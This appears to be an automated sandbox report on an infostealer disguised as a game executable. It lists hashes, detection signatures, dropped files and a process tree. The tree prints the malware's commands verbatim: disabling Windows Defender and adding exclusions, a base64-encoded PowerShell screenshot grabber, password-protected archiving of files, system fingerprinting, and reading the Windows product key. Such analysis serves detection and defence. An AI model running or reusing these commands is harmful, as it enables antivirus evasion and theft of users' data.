Analysis

  • max time kernel
    91s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-01-2025 09:04

General

  • Target

    my game.exe

  • Size

    32.0MB

  • MD5

    1217eb032486aa07a3817155de98c78b

  • SHA1

    9550049f3946bba577505cd00da172923e709859

  • SHA256

    84059e63a6761b009f45551fea6ee623181747853dfc60249b42602b675266cf

  • SHA512

    e0294fbe6d5da99564e4915bdd04996a8032c3fff66055c207815d3b7cf14710a19639d38a8d797db6dba4553abafd082ba9f14584f91c9d13da332ff8a33b48

  • SSDEEP

    98304:STDjWM8JEE1F0amaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIFWw:ST0neNTfm/pf+xk4dWRpmrbW3jmrV

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\my game.exe
    "C:\Users\Admin\AppData\Local\Temp\my game.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Users\Admin\AppData\Local\Temp\my game.exe
      "C:\Users\Admin\AppData\Local\Temp\my game.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5020
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\my game.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3552
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\my game.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4588
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:320
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2632
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error', 0, 'error', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error', 0, 'error', 32+16);close()"
          4⤵
            PID:3624
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎  .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4976
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎  .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:904
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:744
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1544
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:60
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0qperpn3\0qperpn3.cmdline"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1580
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB7E.tmp" "c:\Users\Admin\AppData\Local\Temp\0qperpn3\CSCD8860A2051F040998AD9EAFC951483C6.TMP"
                  6⤵
                    PID:3652
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2488
              • C:\Windows\system32\attrib.exe
                attrib -r C:\Windows\System32\drivers\etc\hosts
                4⤵
                • Drops file in Drivers directory
                • Views/modifies file attributes
                PID:4260
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4544
              • C:\Windows\system32\attrib.exe
                attrib +r C:\Windows\System32\drivers\etc\hosts
                4⤵
                • Drops file in Drivers directory
                • Views/modifies file attributes
                PID:1636
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4820
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:5092
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22522\rar.exe a -r -hp"ilovej" "C:\Users\Admin\AppData\Local\Temp\3NweI.zip" *"
              3⤵
                PID:3644
                • C:\Users\Admin\AppData\Local\Temp\_MEI22522\rar.exe
                  C:\Users\Admin\AppData\Local\Temp\_MEI22522\rar.exe a -r -hp"ilovej" "C:\Users\Admin\AppData\Local\Temp\3NweI.zip" *
                  4⤵
                  • Executes dropped EXE
                  PID:1112
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4996
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic os get Caption
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3692
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2092
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic computersystem get totalphysicalmemory
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4108
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2368
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic csproduct get uuid
                  4⤵
                    PID:2356
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4640
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3120
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1684
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic path win32_VideoController get name
                    4⤵
                    • Detects videocard installed
                    PID:4712
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                  3⤵
                    PID:4984
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2344

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                3a6bad9528f8e23fb5c77fbd81fa28e8

                SHA1

                f127317c3bc6407f536c0f0600dcbcf1aabfba36

                SHA256

                986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                SHA512

                846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                2a99c12bc18d9cf34c05d0bb099685cb

                SHA1

                679e4a313949f1e2cd0553c8b9cfbd3aded62b13

                SHA256

                fda39902bce2f2c343bf3243d50f55444284057205fd2c5c379f265242731003

                SHA512

                5e154f7dbe3aec7a0da7ae5c32f0eb181ab4649d4722af3d3d069c0b038e483c7e19efcb4e9280b056e0dc699c39f97f36653a279ced22fb611d13bb3c9ea1d8

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                64B

                MD5

                367b1c81198bfdcdba813c2c336627a3

                SHA1

                37fe6414eafaaed4abb91c1aafde62c5b688b711

                SHA256

                1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced

                SHA512

                e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b

              • C:\Users\Admin\AppData\Local\Temp\0qperpn3\0qperpn3.dll

                Filesize

                4KB

                MD5

                682c958eb651e45f2b9ae6514611883e

                SHA1

                5b853cba6c3fb477ef6110c1282d1f625dedd94f

                SHA256

                fcf8eda99e3db646645f393fe341c2e1eb428a4aaa56280b3771bf4af72d4588

                SHA512

                c5a7575d6fdb73458b9ff9a69b72a1d7cef672bd658673480c39bcfbc9382ebcb79d19859abc2cc146ac1b4bd7822d57a16dfb1b04117a19fdc84aa8434c9275

              • C:\Users\Admin\AppData\Local\Temp\3NweI.zip

                Filesize

                418KB

                MD5

                4c5d1c26226b4b9661e6b456d194d2b1

                SHA1

                5ce1efb879d192bb0e4ff88c307fa0cc5c9b9efe

                SHA256

                40bd7bd2b9e58246cee1728c8c7306e80f3a839b6f1fa9080c77aa0bb5936d6c

                SHA512

                86406c76192000fb6af6871b8bdc368c261b57384a3ff25f69a17dfbe83921de4aacd03d615e0baf35fca2053105af828837d1651f96aa2aa1ea81e85e10475f

              • C:\Users\Admin\AppData\Local\Temp\RESCB7E.tmp

                Filesize

                1KB

                MD5

                3339d244f03b500a0248a34fe725c4d3

                SHA1

                9c79c45f2305c1cdaf9434c38d4ef189de9d1e7d

                SHA256

                08811776b10ab6ea21a53705cb850a8bc1202246c8d371967fde0cd042da02a1

                SHA512

                8a0f6e0bbb3748e658f2e0e08e21d11f72616d1047dcef7216cd1e05c99dd01295d9d44a98a654ff605ac1e504fb60a1b7f0fae81e32fa63b2d20372f5699575

              • C:\Users\Admin\AppData\Local\Temp\_MEI22522\VCRUNTIME140.dll

                Filesize

                96KB

                MD5

                f12681a472b9dd04a812e16096514974

                SHA1

                6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                SHA256

                d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                SHA512

                7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

              • C:\Users\Admin\AppData\Local\Temp\_MEI22522\_bz2.pyd

                Filesize

                46KB

                MD5

                0c13627f114f346604b0e8cbc03baf29

                SHA1

                bf77611d924df2c80aabcc3f70520d78408587a2

                SHA256

                df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

                SHA512

                c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

              • C:\Users\Admin\AppData\Local\Temp\_MEI22522\_ctypes.pyd

                Filesize

                57KB

                MD5

                38fb83bd4febed211bd25e19e1cae555

                SHA1

                4541df6b69d0d52687edb12a878ae2cd44f82db6

                SHA256

                cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

                SHA512

                f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

              • C:\Users\Admin\AppData\Local\Temp\_MEI22522\_decimal.pyd

                Filesize

                104KB

                MD5

                7ba541defe3739a888be466c999c9787

                SHA1

                ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

                SHA256

                f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

                SHA512

                9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

              • C:\Users\Admin\AppData\Local\Temp\_MEI22522\_hashlib.pyd

                Filesize

                33KB

                MD5

